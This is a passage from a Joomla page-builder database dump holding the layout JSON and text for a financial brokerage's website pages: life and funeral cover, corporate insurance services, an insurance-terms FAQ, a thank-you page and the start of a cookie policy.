us\",\"url\":\"index.php/contact\",\"size\":\"xs\",\"type\":\"danger\",\"icon\":\"\",\"target\":\"\",\"block\":\"sppb-btn-block\",\"margin\":\"\",\"class\":\"\"},\"visibility\":1},{\"type\":\"content\",\"name\":\"empty_space\",\"title\":\"Empty Space\",\"id\":1572122107,\"settings\":{\"admin_label\":\"\",\"gap\":\"30\",\"hidden_md\":\"0\",\"hidden_sm\":\"0\",\"hidden_xs\":\"0\",\"class\":\"\"},\"visibility\":1}],\"visibility\":1},{\"class_name\":\"col-sm-4\",\"settings\":{},\"id\":1572122108,\"addons\":[{\"type\":\"content\",\"name\":\"image\",\"title\":\"Image\",\"id\":1572122109,\"settings\":{\"admin_label\":\"\",\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"image\":\"images/services-life-cover.jpg\",\"alt_text\":\"life cover insurance and funeral cover\",\"position\":\"sppb-text-center\",\"link\":\"http://\",\"target\":\"\",\"class\":\"\",\"open_lightbox\":0},\"visibility\":1},{\"type\":\"content\",\"name\":\"text_block\",\"title\":\"Text Block\",\"id\":1572122110,\"settings\":{\"admin_label\":\"Life Assurance & Funeral Cover\",\"title\":\"Life Assurance & Funeral Cover\",\"heading_selector\":\"h2\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"text\":\"<p class=\\\"descriptor\\\">Cover for the unknown</p><p>Providing cover for the unknown, such as death, serious illness, loss of a family member or permanent disability; life assurance is essential when you have loved ones who depend on you financially. We will help you choose the best product for you and your family.</p>\",\"alignment\":\"sppb-text-left\",\"class\":\"\"},\"visibility\":1},{\"type\":\"general\",\"name\":\"button\",\"title\":\"Button\",\"id\":1572122111,\"settings\":{\"admin_label\":\"Contact us Button\",\"text\":\"Contact us\",\"url\":\"index.php/contact\",\"size\":\"xs\",\"type\":\"danger\",\"icon\":\"\",\"target\":\"\",\"block\":\"sppb-btn-block\",\"margin\":\"\",\"class\":\"\"},\"visibility\":1},{\"type\":\"content\",\"name\":\"empty_space\",\"title\":\"Empty Space\",\"id\":1572122112,\"settings\":{\"admin_label\":\"\",\"gap\":\"30\",\"hidden_md\":\"0\",\"hidden_sm\":\"0\",\"hidden_xs\":\"0\",\"class\":\"\"},\"visibility\":1}],\"visibility\":1}],\"collapse\":\"\",\"title\":\"Row\"}]','com_sppagebuilder','page',0,0,1,0,1,0,'2016-10-30 01:37:31',309,'2019-10-26 20:38:39',309,0,'0000-00-00 00:00:00','[]','Smith & Smith personal solutions','images/services-life-cover.jpg','Smith & Smith provides personal solutions covering everything that is required for you to live your life without having to worry about the “what ifs”. With our easy-to-understand approach, we offer complete solutions that fit your individual needs and cir','*',12498,''),(10,236,'Corporate Solutions','[{\"layout\":\"4,8\",\"settings\":{\"title_position\":\"sppb-text-left\",\"heading_selector\":\"h1\",\"fullscreen\":0,\"margin\":\"25px 0 0 0\",\"padding\":\"25px 0\",\"class\":\"\",\"id\":\"\",\"background_video_ogv\":\"\",\"background_video_mp4\":\"\",\"background_video\":0,\"background_image\":\"\",\"color\":\"\",\"background_color\":\"\",\"subtitle_fontsize\":\"\",\"subtitle\":\"\",\"title_margin_bottom\":\"\",\"title_margin_top\":\"\",\"title_text_color\":\"\",\"title_fontweight\":\"\",\"title_fontsize\":\"\",\"title\":\"Corporate Solutions\"},\"id\":1572122200,\"visibility\":1,\"columns\":[{\"class_name\":\"col-sm-8\",\"settings\":{},\"id\":1572122201,\"addons\":[{\"type\":\"content\",\"name\":\"text_block\",\"title\":\"Text Block\",\"id\":1572122202,\"settings\":{\"admin_label\":\"Corporate Solutions\",\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"text\":\"<p>Owning your own business comes with many unique responsibilities, risks and investment opportunities. We offer comprehensive business insurance products as well as affordable group healthcare coverage and investment solutions that suit your enterprise’s specific requirements.<br><br></p>\",\"alignment\":\"sppb-text-left\",\"class\":\"\"},\"visibility\":1},{\"type\":\"inner_row\",\"layout\":\"4,4,4\",\"disable\":false,\"settings\":{},\"id\":1572122203,\"visibility\":1,\"columns\":[{\"class_name\":\"col-sm-4\",\"settings\":{\"background\":\"\",\"color\":\"\",\"padding\":\"\",\"animation\":\"\",\"animationduration\":\"\",\"animationdelay\":\"\",\"class\":\"services-block\"},\"id\":1572122204,\"addons\":[{\"type\":\"content\",\"name\":\"text_block\",\"title\":\"Text Block\",\"id\":1572122205,\"settings\":{\"admin_label\":\"\",\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"text\":\"<p>- Commercial short-term insurance<br>- Group healthcare<br>- Employee benefits<br>e.g. pension and provident funds</p>\",\"alignment\":\"sppb-text-left\",\"class\":\"\"},\"visibility\":1}],\"visibility\":1},{\"class_name\":\"col-sm-4\",\"settings\":{},\"id\":1572122206,\"addons\":[{\"type\":\"content\",\"name\":\"text_block\",\"title\":\"Text Block\",\"id\":1572122207,\"settings\":{\"admin_label\":\"\",\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"text\":\"<p>- Investment solutions & advice<br>- Risk management<br>- Retirement solutions<br>- Finance planning<br></p>\",\"alignment\":\"sppb-text-left\",\"class\":\"services-block\"},\"visibility\":1}],\"visibility\":1},{\"class_name\":\"col-sm-4\",\"settings\":{},\"id\":1572122208,\"addons\":[{\"type\":\"content\",\"name\":\"text_block\",\"title\":\"Text Block\",\"id\":1572122209,\"settings\":{\"admin_label\":\"\",\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"text\":\"<p>- Business consulting (fee-based)<br>- Drafting of legal agreements<br>e.g. buy & sell agreements and shareholder agreements<br></p>\",\"alignment\":\"sppb-text-left\",\"class\":\"services-block\"},\"visibility\":1}],\"visibility\":1}]}],\"visibility\":1},{\"class_name\":\"col-sm-4\",\"settings\":{\"background\":\"\",\"color\":\"\",\"padding\":\"\",\"animation\":\"\",\"animationduration\":\"\",\"animationdelay\":\"\",\"class\":\"\"},\"id\":1572122210,\"addons\":[{\"type\":\"content\",\"name\":\"text_block\",\"title\":\"Text Block\",\"id\":1572122211,\"settings\":{\"admin_label\":\"Quote Block\",\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"text\":\"<div class=\\\"quote-block\\\"><div><div class=\\\"left\\\"><img src=\\\"images/quote-marks-left.png\\\" alt=\\\"left-quotation\\\" data-mce-src=\\\"images/quote-marks-left.png\\\" width=\\\"36\\\" height=\\\"28\\\"></div></div>You reap all the benefits of a business that cares about clients’ interests.<div><div class=\\\"quote-right\\\"><img src=\\\"images/quote-marks-right.png\\\" alt=\\\"quotation-right\\\" data-mce-src=\\\"images/quote-marks-right.png\\\" width=\\\"36\\\" height=\\\"28\\\"></div></div></div>\",\"alignment\":\"sppb-text-center\",\"class\":\"\"},\"visibility\":1}],\"visibility\":1}],\"collapse\":\"\",\"title\":\"Row\"},{\"layout\":\"4,4,4\",\"settings\":{\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"subtitle\":\"\",\"subtitle_fontsize\":\"\",\"title_position\":\"sppb-text-center\",\"background_color\":\"\",\"color\":\"\",\"background_image\":\"\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_attachment\":\"fixed\",\"background_position\":\"0 0\",\"background_video\":0,\"background_video_mp4\":\"\",\"background_video_ogv\":\"\",\"id\":\"\",\"class\":\"\",\"padding\":\"25px 0\",\"margin\":\"25px 0\",\"fullscreen\":0},\"id\":1572122212,\"visibility\":1,\"columns\":[{\"class_name\":\"col-sm-4\",\"settings\":{\"background\":\"\",\"color\":\"\",\"padding\":\"\",\"animation\":\"\",\"animationduration\":300,\"animationdelay\":0,\"class\":\"\"},\"id\":1572122213,\"addons\":[{\"type\":\"content\",\"name\":\"image\",\"title\":\"Image\",\"id\":1572122214,\"settings\":{\"admin_label\":\"\",\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"image\":\"images/services-corporate.jpg\",\"alt_text\":\"Business investment solutions by Smith & Smith\",\"position\":\"sppb-text-center\",\"link\":\"http://\",\"target\":\"\",\"class\":\"\",\"open_lightbox\":0},\"visibility\":1},{\"type\":\"content\",\"name\":\"text_block\",\"title\":\"Text Block\",\"id\":1572122215,\"settings\":{\"admin_label\":\"Business Investment Solutions\",\"title\":\"Business Investment Solutions\",\"heading_selector\":\"h2\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"text\":\"<p class=\\\"descriptor\\\">Secure your wealth<br></p><p>As a trusted financial brokerage, Smith & Smith provides financial advisory services, finance planning and investment plans to help you achieve your financial goals.</p><p>Our financial planning and investment management philosophy is supported by ongoing research and we maintain our competency by keeping pace with industry developments and standards. This ensures that you reap all the benefits of a business that cares about clients’ interests.</p>\",\"alignment\":\"sppb-text-left\",\"class\":\"\",\"dropcap\":0},\"visibility\":1},{\"type\":\"general\",\"name\":\"button\",\"title\":\"Button\",\"id\":1572122216,\"settings\":{\"admin_label\":\"Contact us Button\",\"text\":\"Contact us\",\"url\":\"index.php/contact\",\"size\":\"xs\",\"type\":\"danger\",\"icon\":\"\",\"target\":\"\",\"block\":\"sppb-btn-block\",\"margin\":\"\",\"class\":\"\"},\"visibility\":1},{\"type\":\"content\",\"name\":\"empty_space\",\"title\":\"Empty Space\",\"id\":1572122217,\"settings\":{\"admin_label\":\"\",\"gap\":\"30\",\"hidden_md\":\"0\",\"hidden_sm\":\"0\",\"hidden_xs\":\"0\",\"class\":\"\"},\"visibility\":1}],\"visibility\":1},{\"class_name\":\"col-sm-4\",\"settings\":{},\"id\":1572122218,\"addons\":[{\"type\":\"content\",\"name\":\"image\",\"title\":\"Image\",\"id\":1572122219,\"settings\":{\"admin_label\":\"\",\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"image\":\"images/services-corporate-medical.jpg\",\"alt_text\":\"Group health insurance and medical aid\",\"position\":\"sppb-text-center\",\"link\":\"http://\",\"target\":\"\",\"class\":\"\",\"open_lightbox\":0},\"visibility\":1},{\"type\":\"content\",\"name\":\"text_block\",\"title\":\"Text Block\",\"id\":1572122220,\"settings\":{\"admin_label\":\"Group Health Insurance\",\"title\":\"Group Health Insurance\",\"heading_selector\":\"h2\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"text\":\"<p class=\\\"descriptor\\\">Nurture a healthy, thriving business</p><p>Investing in your employees is ultimately an investment in your business. The benefits of group health insurance go far in retaining and recruiting employees. It also supports better productivity with more job satisfaction – all leading to a business that is healthy in more than one way.<strong> </strong></p>\",\"alignment\":\"sppb-text-left\",\"class\":\"\"},\"visibility\":1},{\"type\":\"general\",\"name\":\"button\",\"title\":\"Button\",\"id\":1572122221,\"settings\":{\"admin_label\":\"Contact us Button\",\"text\":\"Contact us\",\"url\":\"index.php/contact\",\"size\":\"xs\",\"type\":\"danger\",\"icon\":\"\",\"target\":\"\",\"block\":\"sppb-btn-block\",\"margin\":\"\",\"class\":\"\"},\"visibility\":1},{\"type\":\"content\",\"name\":\"empty_space\",\"title\":\"Empty Space\",\"id\":1572122222,\"settings\":{\"admin_label\":\"\",\"gap\":\"30\",\"hidden_md\":\"0\",\"hidden_sm\":\"0\",\"hidden_xs\":\"0\",\"class\":\"\"},\"visibility\":1}],\"visibility\":1},{\"class_name\":\"col-sm-4 active-column-parent\",\"settings\":{},\"id\":1572122223,\"addons\":[{\"type\":\"content\",\"name\":\"text_block\",\"title\":\"Text Block\",\"id\":1572122224,\"settings\":{\"admin_label\":\"If an association agreement is required:\",\"title\":\"If an association agreement is required:\",\"heading_selector\":\"h2\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"text\":\"<ul><li>We will conduct a survey among staff to establish the level of satisfaction with current arrangements.</li><li>We will investigate your current arrangements in terms of healthcare and other employee benefits.</li><li>On the basis of an agreed strategy, we will facilitate the change to any new medical scheme/administrator or any other insurance products and services if and when necessary</li><li>We will see your staff on an annual basis should they require to change any options and to envisage if their current option is suitable to their healthcare needs.</li><li>We will assist in any way necessary as to give them our full support and service to ensure customer satisfaction.</li></ul>\",\"alignment\":\"sppb-text-left\",\"class\":\"\"},\"visibility\":1}],\"visibility\":1}],\"collapse\":\"\",\"title\":\"Row\"}]','com_sppagebuilder','page',0,0,1,0,1,0,'2016-10-30 05:37:31',309,'2019-10-26 20:38:02',309,0,'0000-00-00 00:00:00','[]','Smith & Smith - Financial advisory services','images/smith-and-smith-images-commercial.jpg','As a trusted financial brokerage, Smith & Smith provides financial advisory services, finance planning and investment plans to help you achieve your financial goals.','*',11906,''),(11,0,'FAQ\'s','[{\"type\":\"sp_row\",\"layout\":\"48\",\"disable\":false,\"settings\":{\"title_position\":\"sppb-text-left\",\"heading_selector\":\"h1\",\"fullscreen\":0,\"margin\":\"25px 0 0 0\",\"padding\":\"25px 0\",\"class\":\"\",\"id\":\"\",\"background_video_ogv\":\"\",\"background_video_mp4\":\"\",\"background_video\":0,\"background_image\":\"\",\"color\":\"\",\"background_color\":\"\",\"subtitle_fontsize\":\"\",\"subtitle\":\"\",\"title_margin_bottom\":\"\",\"title_margin_top\":\"\",\"title_text_color\":\"\",\"title_fontweight\":\"\",\"title_fontsize\":\"\",\"title\":\"Frequently Asked Questions\"},\"attr\":[{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-8\",\"settings\":{},\"attr\":[{\"type\":\"content\",\"name\":\"text_block\",\"title\":\"Text Block\",\"atts\":{\"admin_label\":\"Personal Solutions\",\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"text\":\"Got a question? Confused about financial terms or the difference between life insurance and life assurance? Our list of frequently asked questions aims to put serious matters into simple terms.\",\"alignment\":\"sppb-text-left\",\"class\":\"\"},\"scontent\":[]}]},{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-4\",\"settings\":{\"sortableitem\":\"[object Object]\"},\"attr\":[{\"type\":\"content\",\"name\":\"text_block\",\"title\":\"Text Block\",\"atts\":{\"admin_label\":\"\",\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"text\":\"If you have any specific questions or require any further information please feel free to <a href=\\\"/smith/contact\\\" data-mce-href=\\\"contact\\\">contact us.</a><br>\",\"alignment\":\"sppb-text-left\",\"class\":\"\"},\"scontent\":[]}]}]},{\"type\":\"sp_row\",\"layout\":12,\"disable\":false,\"settings\":{},\"attr\":[{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-12\",\"settings\":{},\"attr\":[{\"type\":\"repeatable\",\"name\":\"accordion\",\"title\":\"Accordion\",\"atts\":{\"admin_label\":\"\",\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"style\":\"panel-default\",\"class\":\"\"},\"scontent\":[{\"type\":\"repeatable\",\"name\":\"sp_accordion_item\",\"atts\":{\"title\":\"What is a retirement annuity?\",\"icon\":\"\",\"content\":\"A retirement annuity is a savings plan towards retirement that pays a lump sum in cash as well as a monthly income during your retirement.\"}},{\"type\":\"repeatable\",\"name\":\"sp_accordion_item\",\"atts\":{\"title\":\"What is life insurance?\",\"icon\":\"\",\"content\":\"Life insurance gives you insurance cover for a certain period of time (this is the policy\'s \\\"term\\\"). If you were to die while the policy is in force, the insurance company pays out a tax-free sum. If you survive to the end of the term, the policy is finished and has no residual value. It only has a value if there is a claim. This policy also does not allow its owner to invest in it, making it entirely about insurance.\"}},{\"type\":\"repeatable\",\"name\":\"sp_accordion_item\",\"atts\":{\"title\":\"What is a fixed asset?\",\"icon\":\"\",\"content\":\"A fixed asset is refers to your properties or possessions that cannot be moved, for example a building.\"}},{\"type\":\"repeatable\",\"name\":\"sp_accordion_item\",\"atts\":{\"title\":\"What is domestic insurance? \",\"icon\":\"\",\"content\":\"Also known as home contents insurance and residential insurance, domestic insurance includes contents and house insurance. Contents insurance covers the contents of your home against theft or damage and can include your furniture, clothes, appliances and general household possessions. Home owners insurance covers your house with reference to damage to the actual building and structure.\"}},{\"type\":\"repeatable\",\"name\":\"sp_accordion_item\",\"atts\":{\"title\":\"What is a broker?\",\"icon\":\"\",\"content\":\"A broker is an intermediary appointed by someone seeking financial advice and who will advise them on insurance matters as well as arrange insurance cover for them. A broker is independent and not affiliated or linked to only one insurer.\"}},{\"type\":\"repeatable\",\"name\":\"sp_accordion_item\",\"atts\":{\"title\":\"What is a claim?\",\"icon\":\"\",\"content\":\"A claim is a notification to an insurance company that either a payout or some benefit is needed because a loss which is covered by the policy has occurred.\"}},{\"type\":\"repeatable\",\"name\":\"sp_accordion_item\",\"atts\":{\"title\":\"What does the excess refer to in an insurance claim?\",\"icon\":\"\",\"content\":\"The excess is the share of an insurance claim which the insured person is responsible for paying and ranges up to a value determined by the insurance policy.\"}},{\"type\":\"repeatable\",\"name\":\"sp_accordion_item\",\"atts\":{\"title\":\"What is a policy?\",\"icon\":\"\",\"content\":\"A policy is a document issued to an insured person from the insurer and which sets out the terms and conditions of the insurance contract.\"}},{\"type\":\"repeatable\",\"name\":\"sp_accordion_item\",\"atts\":{\"title\":\"What is an indemnity policy?\",\"icon\":\"\",\"content\":\"In so far as is possible, an indemnity policy restores the insured person to the same financial position they were in immediately prior to the loss, accident or damage that the insured person suffered.\"}},{\"type\":\"repeatable\",\"name\":\"sp_accordion_item\",\"atts\":{\"title\":\"What is a premium?\",\"icon\":\"\",\"content\":\"It is the prescribed amount paid by the insured person for the active insurance coverage that the insurance company provides.\"}},{\"type\":\"repeatable\",\"name\":\"sp_accordion_item\",\"atts\":{\"title\":\"What does underwrite mean?\",\"icon\":\"\",\"content\":\"It is the process an insurer goes through when evaluating, accepting or rejecting an insurance risk.\"}},{\"type\":\"repeatable\",\"name\":\"sp_accordion_item\",\"atts\":{\"title\":\"What is a benefit?\",\"icon\":\"\",\"content\":\"In terms of retirement funds, the benefit refers to any amount payable in terms of the fund’s conditions. A benefit may be paid on cancelation, retirement or the death of the member.\"}},{\"type\":\"repeatable\",\"name\":\"sp_accordion_item\",\"atts\":{\"title\":\"Commercial insurance or business insurance?\",\"icon\":\"\",\"content\":\"This type of insurance covers a business, institution or commercial entity and its assets against possible losses or damage.\"}},{\"type\":\"repeatable\",\"name\":\"sp_accordion_item\",\"atts\":{\"title\":\"Car insurance or motor insurance? \",\"icon\":\"\",\"content\":\"This type of insurance covers your car against theft as well as damage that can result from an accident.\"}},{\"type\":\"repeatable\",\"name\":\"sp_accordion_item\",\"atts\":{\"title\":\"What is funeral cover and funeral insurance?\",\"icon\":\"\",\"content\":\"This type of insurance covers you against the expenses associated with your own funeral, or the funeral of a family member.\"}},{\"type\":\"repeatable\",\"name\":\"sp_accordion_item\",\"atts\":{\"title\":\"What is short-term insurance?\",\"icon\":\"\",\"content\":\"Short-term insurance encompasses all types of insurance policies other than life insurance cover and is taken for set periods.\"}}]}]}]}]','com_sppagebuilder','page',0,0,1,0,1,0,'2016-10-30 07:37:31',309,'2017-01-16 06:04:28',309,0,'0000-00-00 00:00:00','[]','','','','*',6595,''),(12,242,'Thank-you','[{\"id\":1535622300871,\"visibility\":true,\"collapse\":false,\"settings\":{\"admin_label\":\"\",\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_position\":\"sppb-text-center\",\"columns_align_center\":0,\"fullscreen\":0,\"no_gutter\":0,\"padding\":{\"md\":\"290px 0px 290px 0px\",\"sm\":\" \",\"xs\":\"60px 0px 60px 0px\"},\"margin\":{\"md\":\"0px 0px 0px 0px\",\"sm\":\" \",\"xs\":\" \"},\"background_type\":\"image\",\"background_gradient\":{\"color\":\"#00c6fb\",\"color2\":\"#005bea\",\"deg\":\"45\",\"type\":\"linear\"},\"background_image\":\"images/2020/04/23/mohamed-masaau-nff5-g6cfwy-unsplash.jpg\",\"background_parallax\":0,\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_attachment\":\"inherit\",\"background_position\":\"50% 50%\",\"external_background_video\":\"0\",\"video_loop\":false,\"show_top_shape\":0,\"shape_name\":\"clouds-flat\",\"shape_color\":\"#e5e5e5\",\"shape_width\":{\"md\":100,\"sm\":100,\"xs\":100},\"shape_height\":\"\",\"shape_flip\":false,\"shape_invert\":false,\"shape_to_front\":false,\"show_bottom_shape\":0,\"bottom_shape_name\":\"clouds-opacity\",\"bottom_shape_color\":\"#e5e5e5\",\"bottom_shape_width\":{\"md\":100,\"sm\":100,\"xs\":100},\"bottom_shape_height\":\"\",\"bottom_shape_flip\":false,\"bottom_shape_invert\":false,\"bottom_shape_to_front\":false,\"hidden_xs\":\"\",\"hidden_sm\":\"\",\"hidden_md\":\"\",\"animationduration\":\"300\",\"animationdelay\":\"0\",\"instFormId\":1535622300871,\"overlay_type\":\"overlay_color\",\"color\":\"AF0922\",\"subtitle\":\"\"},\"layout\":\"8\",\"columns\":[{\"id\":1535622300923,\"class_name\":\"col-md-8\",\"visibility\":true,\"settings\":{\"background_type\":\"none\",\"background_gradient\":{\"color\":\"#00c6fb\",\"color2\":\"#005bea\",\"deg\":\"45\",\"type\":\"linear\"},\"background_image\":\"\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_attachment\":\"scroll\",\"background_position\":\"0 0\",\"items_align_center\":0,\"use_border\":0,\"border_width\":\"\",\"border_radius\":0,\"boxshadow\":\"0 0 0 0 #fff\",\"sm_col\":\"\",\"xs_col\":\"\",\"hidden_xs\":\"\",\"hidden_sm\":\"\",\"hidden_md\":\"\",\"animationduration\":\"300\",\"animationdelay\":\"0\"},\"addons\":[{\"id\":1587645254655,\"name\":\"text_block\",\"visibility\":true,\"settings\":{\"admin_label\":\"\",\"title\":\"Thank you \",\"heading_selector\":\"h1\",\"title_fontsize\":{\"md\":\"\",\"sm\":\"\",\"xs\":\"\"},\"title_lineheight\":{\"md\":\"\",\"sm\":\"\",\"xs\":\"\"},\"title_letterspace\":\"0\",\"text\":\"We will get back to you soon\",\"alignment\":\"sppb-text-left\",\"text_fontsize\":{\"md\":\"20\",\"sm\":\"\",\"xs\":\"\"},\"text_lineheight\":\"\",\"text_fontweight\":\"\",\"dropcap\":0,\"class\":\"\",\"global_background_type\":\"none\",\"global_background_gradient\":{\"color\":\"#00c6fb\",\"color2\":\"#005bea\",\"deg\":\"45\",\"type\":\"linear\"},\"global_background_repeat\":\"no-repeat\",\"global_background_size\":\"cover\",\"global_background_attachment\":\"inherit\",\"global_background_position\":\"50% 50%\",\"global_use_overlay\":0,\"global_overlay_type\":\"overlay_none\",\"global_gradient_overlay\":{\"color\":\"rgba(127, 0, 255, 0.8)\",\"color2\":\"rgba(225, 0, 255, 0.7)\",\"deg\":\"45\",\"type\":\"linear\"},\"global_pattern_overlay\":\"\",\"global_overlay_pattern_color\":\"\",\"blend_mode\":\"normal\",\"global_user_border\":0,\"global_border_width\":\"\",\"global_border_radius\":0,\"global_margin\":{\"md\":\"0px 0px 30px 0px\",\"sm\":\"0px 0px 20px 0px\",\"xs\":\"0px 0px 10px 0px\"},\"global_padding\":{\"md\":\" \",\"sm\":\" \",\"xs\":\" \"},\"global_boxshadow\":\"0 0 0 0 #ffffff\",\"global_use_animation\":0,\"global_animationduration\":\"300\",\"global_animationdelay\":\"0\",\"global_custom_css\":\"\",\"global_custom_position\":0,\"global_seclect_position\":\"relative\",\"global_addon_position_left\":{\"unit\":\"px\"},\"global_addon_position_top\":{\"unit\":\"px\"},\"use_global_width\":\"0\",\"hidden_md\":\"0\",\"hidden_sm\":\"0\",\"hidden_xs\":\"0\",\"acl\":\"\",\"while_scroll_view\":[{\"enable_while_scroll_view\":0,\"on_scroll_actions\":[{\"id\":\"b3fdc1c1e6bfde5942ea\",\"index\":0,\"keyframe\":0,\"name\":\"move\",\"property\":{\"x\":\"0\",\"y\":\"-100\",\"z\":\"0\"},\"range\":{\"max\":500,\"min\":-500,\"stop\":1},\"single\":true,\"title\":\"Move\"},{\"id\":\"936e0225e6dc8edfba7d\",\"index\":1,\"keyframe\":100,\"name\":\"move\",\"property\":{\"x\":0,\"y\":0,\"z\":0},\"range\":{\"max\":500,\"min\":-500,\"stop\":1},\"single\":true,\"title\":\"Move\"}],\"transition_origin_x\":\"center\",\"transition_origin_y\":\"center\",\"enable_tablet\":0,\"enable_mobile\":0}],\"mouse_movement\":[{\"enable_tilt_effect\":0,\"mouse_tilt_direction\":\"direct\",\"mouse_tilt_speed\":\"1\",\"mouse_tilt_max\":\"15\",\"enable_tablet\":0,\"enable_mobile\":0}],\"font_family\":\"Open Sans\",\"title_text_color\":\"#ef2d2d\",\"text_font_family\":\"Open Sans\",\"global_text_color\":\"#ffffff\"}}]}]}]','com_sppagebuilder','page',0,0,1,0,1,0,'0000-00-00 00:00:00',310,'2020-04-23 12:51:36',310,0,'0000-00-00 00:00:00','[]','','','','*',1031,''),(13,246,'Cookie Policy','[{\"id\":1535622300871,\"visibility\":true,\"collapse\":false,\"settings\":{\"admin_label\":\"\",\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_position\":\"sppb-text-center\",\"columns_align_center\":0,\"fullscreen\":0,\"no_gutter\":0,\"padding\":{\"md\":\"50px 0px 50px 0px\",\"sm\":\" \",\"xs\":\"60px 0px 60px 0px\"},\"margin\":{\"md\":\"0px 0px 0px 0px\",\"sm\":\" \",\"xs\":\" \"},\"background_type\":\"image\",\"background_gradient\":{\"color\":\"#00c6fb\",\"color2\":\"#005bea\",\"deg\":\"45\",\"type\":\"linear\"},\"background_image\":\"\",\"background_parallax\":0,\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_attachment\":\"inherit\",\"background_position\":\"50% 50%\",\"external_background_video\":\"0\",\"video_loop\":false,\"show_top_shape\":0,\"shape_name\":\"clouds-flat\",\"shape_color\":\"#e5e5e5\",\"shape_width\":{\"md\":100,\"sm\":100,\"xs\":100},\"shape_height\":\"\",\"shape_flip\":false,\"shape_invert\":false,\"shape_to_front\":false,\"show_bottom_shape\":0,\"bottom_shape_name\":\"clouds-opacity\",\"bottom_shape_color\":\"#e5e5e5\",\"bottom_shape_width\":{\"md\":100,\"sm\":100,\"xs\":100},\"bottom_shape_height\":\"\",\"bottom_shape_flip\":false,\"bottom_shape_invert\":false,\"bottom_shape_to_front\":false,\"hidden_xs\":\"\",\"hidden_sm\":\"\",\"hidden_md\":\"\",\"animationduration\":\"300\",\"animationdelay\":\"0\",\"instFormId\":1535622300871,\"overlay_type\":\"overlay_color\",\"color\":\"AF0922\",\"subtitle\":\"\",\"row_border\":0},\"layout\":\"8\",\"columns\":[{\"id\":1535622300923,\"class_name\":\"col-md-8\",\"visibility\":true,\"settings\":{\"background_type\":\"none\",\"background_gradient\":{\"color\":\"#00c6fb\",\"color2\":\"#005bea\",\"deg\":\"45\",\"type\":\"linear\"},\"background_image\":\"\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_attachment\":\"scroll\",\"background_position\":\"0 0\",\"items_align_center\":0,\"use_border\":0,\"border_width\":\"\",\"border_radius\":0,\"boxshadow\":\"0 0 0 0 #fff\",\"sm_col\":\"\",\"xs_col\":\"\",\"hidden_xs\":\"\",\"hidden_sm\":\"\",\"hidden_md\":\"\",\"animationduration\":\"300\",\"animationdelay\":\"0\"},\"addons\":[{\"id\":1587645254655,\"name\":\"text_block\",\"visibility\":true,\"settings\":{\"admin_label\":\"Site Cookie Policy\",\"title\":\"\",\"heading_selector\":\"h1\",\"title_fontsize\":{\"md\":\"\",\"sm\":\"\",\"xs\":\"\"},\"title_lineheight\":{\"md\":\"\",\"sm\":\"\",\"xs\":\"\"},\"title_letterspace\":\"0\",\"text\":\"Welcome to our cookie policy. The purpose of this policy is to describe what cookies are, what we use them for, and how you can manage them during your visit to or use of our website.<br /><br /><strong>What are cookies?</strong><br /><br />We may place small text files called ‘cookies’ on your device when you visit our website. These files do not contain personal data, but they do contain a personal identifier allowing us to associate your personal data with a certain device. Many websites use cookies and you can find out more about them at All About Cookies.<br /><br /><strong>Why do we use cookies?</strong><br /><br />These files serve several useful purposes for you, including:<br /><br />• granting you access to restricted content;<br />• tailoring our website’s 